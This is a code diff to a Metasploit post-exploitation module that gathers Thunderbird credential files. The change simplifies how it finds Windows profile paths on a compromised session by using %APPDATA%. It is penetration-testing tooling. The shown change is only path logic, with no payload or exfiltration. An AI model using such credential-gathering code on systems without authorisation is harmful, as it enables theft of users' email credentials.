diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb
index 1810c966f3..e700ceb4b5 100644
--- a/modules/post/multi/gather/thunderbird_creds.rb
+++ b/modules/post/multi/gather/thunderbird_creds.rb
@@ -56,18 +56,11 @@ class Metasploit3 < Msf::Post
 			base = "/Users/#{user}/Library/Thunderbird/Profiles/"
 		when /win/
 			if session.type =~ /meterpreter/
-				user_profile = session.fs.file.expand_path("%USERPROFILE%")
+				user_profile = session.fs.file.expand_path("%APPDATA%")
 			else
-				user_profile = cmd_exec("echo %USERPROFILE%").strip
-			end
-
-			if user_profile =~ /^C:\\Users\\/
-				# Windows Vista or newer
-				base = user_profile + '\\AppData\\Roaming\\Thunderbird\\Profiles\\'
-			else
-				# Windows XP
-				base = user_profile + '\\Application Data\\Thunderbird\\Profiles\\'
+				user_profile = cmd_exec("echo %APPDATA%").strip
 			end
+			base = user_profile + "\\Thunderbird\\Profiles\\"
 		end
 
 		# Now we have the path for Thunderbird, we still need to enumerate its
@@ -252,4 +245,4 @@ to load the lib).  Not to mention you need to borrow several more Mozilla compon
 do the decryption.  BDB gem unfortunately is kind of busted during my testing, so I guess
 we can pretty much forget about doing the decryption locally... chances are a lot of
 users would have problems just to get that setup going anyway.
-=end
\ No newline at end of file
+=end